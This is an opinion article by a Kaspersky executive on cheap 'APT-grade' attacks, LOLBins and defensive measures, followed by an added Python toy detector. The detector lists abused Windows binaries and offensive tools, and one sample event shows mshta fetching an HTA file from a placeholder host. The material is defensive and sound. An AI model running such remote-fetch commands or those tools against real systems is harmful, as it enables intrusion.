Cybercriminal logic differs little from that of common criminals – both are inspired by the idea of getting more for less effort and escaping punishment.
Adversaries usually want to be cost-effective in their operations, and if the revenue from an attack is less than its cost, it is of no interest to them. This is like a thief being less likely to break into a well-guarded house surrounded by a solid fence and equipped with an advanced alarm system. Of course, the possible pay-off would be great, but preparing a heist against such a protected target would take time, additional skills and expensive tools, and the risk of detection would still be high. Why do this when there is plenty of easy prey vulnerable enough to yield a healthy profit?
Cybercriminals think the same way and usually go after soft targets. So the majority of IT security incidents are still connected with easily performed attacks. For instance, according to the recent Kaspersky Incident Response Analytics report, 63% of investigated attacks were caused by insufficient patch management and bad password policy, which shows that a large number of companies still have problems with basic security controls. It is no wonder, then, that cybercrime is so profitable: Deloitte study findings show that adversaries can execute a cyberattack for as little as $34 per month and net a revenue of $25K from it.
The situation described above might create the impression that organisations with a high security level are safe and of no interest to intruders, but that is not true. Firstly, risk factors like human error and the complexity of the infrastructure can provide an opening for cybercriminals in even the most secure environment. Secondly, there is another alarming issue that has already become a growing trend: organising and executing a high-quality, APT-grade attack is getting easier and therefore more profitable for criminals.
What is an APT-grade attack?
As you may know, a regular Advanced Persistent Threat is very selective. It mainly aims at high-value targets such as national institutions or enterprises of national importance. Its goal is to stay unnoticed for a prolonged period in order to gather valuable strategic information or sabotage critical infrastructure. The cost of an APT is usually very high, as it requires a lot of resources, but its results are difficult to evaluate in monetary terms because of its intelligence focus.
An APT-grade attack uses an APT toolkit and can have a huge negative impact, but the two types of attack are not the same. Firstly, an APT-grade attack is not committed by the APT actors catalogued in MITRE ATT&CK. Another difference is that an APT-grade intruder has practical objectives. Leaked APT actors' tactics, techniques and procedures (TTPs) help cybercriminals achieve quick and measurable profit goals such as stealing money or extorting a ransom. That is why APT-grade adversaries are not so picky about their targets. The problem is that the advanced TTPs they apply significantly complicate detection and response for defenders, so all kinds of organisations are at risk.
The best-known example of this type of attack is the WannaCry case, in which intruders used the EternalBlue exploit leaked by The Shadow Brokers to infect more than 230,000 computer systems and caused losses of approximately $4 billion.
What is the githubification of crime, and how does it affect the profitability of attacks?
Today, even less advanced cybercriminals can easily obtain APT tools and conduct complex, discreet attacks. It is similar to an ordinary burglar gaining access to the sophisticated plans drawn up by the Professor, the Money Heist character. Of course, street criminals could not implement such a brilliant plan in full, but they could definitely adopt some of its ideas and increase the efficiency of their robberies.
In the world of cybercrime, this situation is a reality thanks to githubification. The term originally described a community-based approach in infosec that speeds up learning for defenders: information security specialists learn together and share experience and skills, saving time and ensuring that specialists reach expert level. Unfortunately, adversaries benefit from this process too, pooling their skills so that every attacker can be as good as the best attacker. The approach is time- and cost-efficient because it allows existing instruments and techniques to be reused. It makes it possible for cybercriminals to learn how to perform attacks that go unnoticed instead of creating a tool that endpoint protection solutions can detect automatically. This applies especially to fileless attacks, or attacks without malicious software, where the adversaries' code lives in the memory of a system process.
According to the results of the recent Incident Response Analytics report, almost half of all incident cases in 2020 involved the use of existing OS tools (Living Off the Land Binaries, or LOLBins), well-known offensive tools from GitHub (e.g. Mimikatz, AdFind and Masscan) and specialised commercial frameworks (Cobalt Strike), a figure 13% higher than in the previous year. LOLBins are especially popular in high-severity incidents, which are usually human-driven and have a huge impact.
Because LOLBins are legitimate native binaries, they provide the perfect disguise for malware that aims to get into company infrastructure and cannot be picked out by artificial intelligence (AI). AI looks for similarities, while adversaries always invent something new and unique. It goes without saying that AI-based technologies can be very helpful and contribute to reducing IT security costs, especially for detecting false-positive activity, but high-profile malicious activity remains out of reach for automated solutions. Human-driven malicious activity should, unsurprisingly, be detected by a human.
How can businesses cope with these types of attacks?
What actions could be taken to protect from this growing threat and reduce the impact of cybercrimes on business? First of all, basic cybersecurity needs should be fulfilled because even the most advanced attacks often start with the exploitation of trivial vulnerabilities:
- Make sure that company employees have a clear understanding of information security policy and know what risks any violations bring. Regular comprehensible security awareness training shouldn’t just be a formal procedure because it is a crucial measure to reduce the negative impact of phishing emails and weak passwords.
- In most cases, attackers use old, unpatched vulnerabilities to penetrate the infrastructure. That is why consistent patch management, including regularly tracking vulnerability details published by software vendors, scanning the network and installing patches, is a must-have for all kinds of organisations.
The next stage in improving IT security readiness is adequate detection and response measures:
- Combine different tactics to detect threats. Even a complex attack consists of simple steps and techniques, and detecting a single technique can reveal the whole attack. Different detection technologies contribute to finding different adversary techniques, so maintaining a variety of security technologies raises the chances of detection. At the very least, an endpoint protection platform and a network intrusion detection system should be used.
- Security Operations Center (SOC) teams have to ensure that they possess the relevant skills and tools. For instance, red teaming exercises have to simulate realistic, complex attacks that leverage the latest adversary tactics, such as new evasion techniques using the CLR, and provide a clear picture of the company's operational security status.
- Managed Detection and Response (MDR) services can be a cost-efficient solution for companies at any level of information security maturity. For companies with less cybersecurity maturity, this type of service can replace a SOC, as it provides automated as well as manual threat detection, which is essential against fileless attacks. More advanced companies can still benefit from MDR because it adds a further layer of scanning and expert evaluation of incidents.
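As an added illustration of the LOLBin point above and of the advice to combine detection tactics (not part of the original article or Kaspersky's tooling), the following Python sketch scores constructed process-creation events against a few independent technique rules and correlates per-host hits into one incident. The binary lists, field names (modelled on Sysmon Event ID 1) and sample events are assumptions.

```python
"""Toy detector for LOLBin and off-the-shelf tool usage in process-creation events.
Added illustration, not Kaspersky's code: the field names mirror Sysmon Event ID 1
(host, parent image, image, command line), the events are constructed, and the rules
are deliberately simplified."""
import re
from collections import defaultdict

# Native Windows binaries commonly abused as LOLBins (small illustrative subset).
LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "bitsadmin.exe"}
# Parents that should rarely launch LOLBins: Office applications and script hosts.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wscript.exe", "cscript.exe"}
# Well-known offensive tools named in the article, matched by name in the command line.
OFFENSIVE_TOOLS = re.compile(r"\b(mimikatz|adfind|masscan)\b", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

def detect(event):
    """Return the technique labels matched by one event; each label is one detection tactic."""
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    hits = []
    if OFFENSIVE_TOOLS.search(cmd):
        hits.append("known_offensive_tool")
    if image in LOLBINS and parent in SUSPICIOUS_PARENTS:
        hits.append("lolbin_from_suspicious_parent")
    if image in LOLBINS and REMOTE_URL.search(cmd):
        hits.append("lolbin_remote_content")
    return hits

def correlate(events, threshold=2):
    """Group technique hits per host; a host with >= threshold distinct techniques is an incident.
    A single technique hit can expose the chain; requiring several keeps false positives down."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(detect(ev))
    return {host: sorted(techs) for host, techs in per_host.items() if len(techs) >= threshold}

# Constructed sample events, not real telemetry. WS01 shows a chain; WS02 is benign admin use.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": "WINWORD.EXE", "image": "mshta.exe",
     "cmdline": "mshta.exe https://files.example.invalid/doc.hta"},
    {"host": "WS01", "parent": "cmd.exe", "image": "adfind.exe",
     "cmdline": "adfind.exe -f objectcategory=computer"},
    {"host": "WS02", "parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -hashfile C:\\installers\\setup.msi SHA256"},
]

if __name__ == "__main__":
    for host, techs in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(techs)}")
```

In a real deployment the rules would be one input among many (network IDS, endpoint protection, MDR analyst review); the point is that each rule covers a different technique and the correlation step turns scattered hits into one human-reviewable incident.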
Amir Kanaan is the Managing Director for Middle East, Turkey and Africa at Kaspersky